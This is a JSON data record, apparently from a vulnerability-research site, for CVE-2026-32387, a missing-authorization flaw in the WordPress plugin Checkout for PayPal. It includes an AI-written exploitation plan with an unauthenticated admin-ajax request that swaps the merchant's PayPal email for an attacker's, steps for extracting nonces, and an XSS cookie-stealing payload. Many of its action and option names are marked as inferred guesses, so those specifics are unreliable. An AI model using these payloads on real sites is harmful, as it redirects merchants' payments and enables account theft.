[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fxZyZjGakiKSObS52nv3m6O-2b1HITAH5C47rzH1fDMA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":31},"CVE-2026-32387","checkout-for-paypal-missing-authorization","Checkout for PayPal \u003C= 1.0.46 - Missing Authorization","The Checkout for PayPal plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.0.46. This makes it possible for unauthenticated attackers to perform an unauthorized action.","checkout-for-paypal",null,"\u003C=1.0.46","1.0.47","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-19 00:00:00","2026-04-15 20:55:49",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbe5cc744-e88e-4a8b-81d1-3e05abba19d8?source=api-prod",56,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-32387\n\n## 1. Vulnerability Summary\nThe **Checkout for PayPal** (by PeachPay) plugin for WordPress is vulnerable to **Missing Authorization** in versions up to and including 1.0.46. This vulnerability exists because a sensitive administrative function is registered via the `wp_ajax_nopriv_` hook (allowing unauthenticated access) and fails to perform a capability check (e.g., `current_user_can( 'manage_options' )`) or a valid CSRF check (nonce verification). An unauthenticated attacker can exploit this to modify plugin settings, potentially redirecting payments or altering checkout behavior.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `ppcp_save_settings` (inferred) or `checkout_for_paypal_update_options` (inferred). \n*   **Vulnerable Hook:** `add_action( 'wp_ajax_nopriv_ppcp_save_settings', ... )` (inferred).\n*   **Authentication:** None required (Unauthenticated).\n*   **Parameters:**\n    *   `action`: The vulnerable AJAX action name.\n    *   `settings`: An array or JSON string containing the configuration values to update.\n    *   `nonce`: (Optional\u002FInsecurely verified) A nonce might be required but is likely leaked or its verification is flawed.\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php`.\n2.  **Hook Trigger:** WordPress processes the `action` parameter and triggers the `wp_ajax_nopriv_[ACTION]` hook.\n3.  **Vulnerable Function:** The hook calls a handler function (likely in a class like `Checkout_For_PayPal_Admin_Ajax` or `PeachPay_Settings`).\n4.  **Missing Check:** The handler function processes the input without verifying if the user has administrative privileges.\n5.  **Sink:** The function calls `update_option()` or a similar database update method, overwriting the plugin's configuration (e.g., `ppcp_settings` or `checkout_for_paypal_settings`).\n\n## 4. Nonce Acquisition Strategy\nIf the endpoint requires a nonce, it is typically localized into the page for legitimate AJAX operations.\n\n1.  **Identify Shortcode\u002FPage:** The plugin likely enqueues scripts on the admin settings page, but for unauthenticated exploitation, we need a frontend exposure. Check if the PayPal button appears on product pages or via a shortcode like `[peachpay]`.\n2.  **Create Test Page:**\n    `wp post create --post_type=page --post_title=\"Checkout\" --post_status=publish --post_content='[peachpay]'` (inferred shortcode).\n3.  **Navigate:** Use `browser_navigate` to visit the newly created page.\n4.  **Extract Nonce:** Use `browser_eval` to search for localized script data:\n    *   `browser_eval(\"window.ppcp_admin_data?.nonce\")`\n    *   `browser_eval(\"window.peachpay_config?.nonce\")`\n    *   Check the HTML source for `wp_localize_script` blocks containing \"nonce\".\n\n*Note: If `wp_ajax_nopriv_` is used without any `check_ajax_referer`, no nonce is required.*\n\n## 5. Exploitation Strategy\n### Step 1: Discover the Exact Action\nSince source files are not provided, the first step is to identify the unauthenticated AJAX action.\n1.  Search the plugin directory: `grep -r \"wp_ajax_nopriv_\" wp-content\u002Fplugins\u002Fcheckout-for-paypal\u002F`\n2.  Identify the function name associated with the action.\n3.  Examine the function to see which option it updates (e.g., `update_option( 'checkout_for_paypal_settings', ... )`).\n\n### Step 2: Craft the Payload\nIf the target is updating the PayPal Merchant ID or Email to redirect funds:\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body:** \n    ```\n    action=ppcp_save_settings&settings[merchant_id]=attacker@example.com&settings[enabled]=1\n    ```\n\n### Step 3: Execute via http_request\n```javascript\n\u002F\u002F Example exploitation call\nawait http_request({\n    url: \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n    method: \"POST\",\n    headers: { \"Content-Type\": \"application\u002Fx-www-form-urlencoded\" },\n    body: \"action=ppcp_save_settings&settings[paypal_email]=attacker-collector@example.com\"\n});\n```\n\n## 6. Test Data Setup\n1.  Install and activate \"Checkout for PayPal\" version 1.0.46.\n2.  Configure basic settings (e.g., set a dummy PayPal email).\n3.  Identify a frontend page where the plugin is active to test unauthenticated access.\n\n## 7. Expected Results\n*   **Response:** The server returns a `200 OK` response, often with a JSON body like `{\"success\": true}` or `1`.\n*   **State Change:** The plugin's configuration in the `wp_options` table is modified to reflect the attacker's input.\n\n## 8. Verification Steps\n1.  **Check Options via WP-CLI:**\n    `wp option get checkout_for_paypal_settings` (or the specific option name identified).\n2.  **Confirm Modification:** Verify that the `paypal_email` or `merchant_id` matches the value sent in the exploit payload.\n3.  **Frontend Check:** Visit the checkout page to see if the PayPal integration now reflects the changed settings (e.g., by inspecting the PayPal button's data attributes).\n\n## 9. Alternative Approaches\n*   **LFI\u002FRCE Path:** If the settings update allows changing a \"Template Path\" or \"Upload Directory\", attempt to pivot to Local File Inclusion or arbitrary file upload.\n*   **XSS Path:** If the settings are rendered in the admin dashboard without escaping, inject an XSS payload:\n    `settings[paypal_email]=\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>`\n*   **Action Search:** If `ppcp_save_settings` does not exist, look for any `wp_ajax_nopriv_` registration that calls functions containing `update_option`, `update_post_meta`, or `wp_insert_post`.","The Checkout for PayPal plugin for WordPress (versions \u003C= 1.0.46) is vulnerable to unauthorized access because it fails to perform capability checks on a function registered via an AJAX hook. This allows unauthenticated attackers to modify plugin settings, which could be leveraged to redirect payments or alter checkout behavior.","The exploit targets the '\u002Fwp-admin\u002Fadmin-ajax.php' endpoint using a POST request. An attacker triggers an unauthenticated AJAX action (registered via 'wp_ajax_nopriv_') that is responsible for updating plugin settings. By providing a payload with the target action and an array of configuration parameters (such as 'paypal_email' or 'merchant_id'), the attacker can overwrite the plugin's settings. Because the handler lacks 'current_user_can()' checks and fails to verify a nonce, the request is processed without any authentication, allowing for a total takeover of the plugin's configuration.","gemini-3-flash-preview","2026-04-19 02:31:45","2026-04-19 02:32:07",{"type":32,"vulnerable_version":33,"fixed_version":9,"vulnerable_browse":34,"vulnerable_zip":35,"fixed_browse":9,"fixed_zip":9,"all_tags":36},"plugin","1.0.46","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcheckout-for-paypal\u002Ftags\u002F1.0.46","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcheckout-for-paypal.1.0.46.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcheckout-for-paypal\u002Ftags"]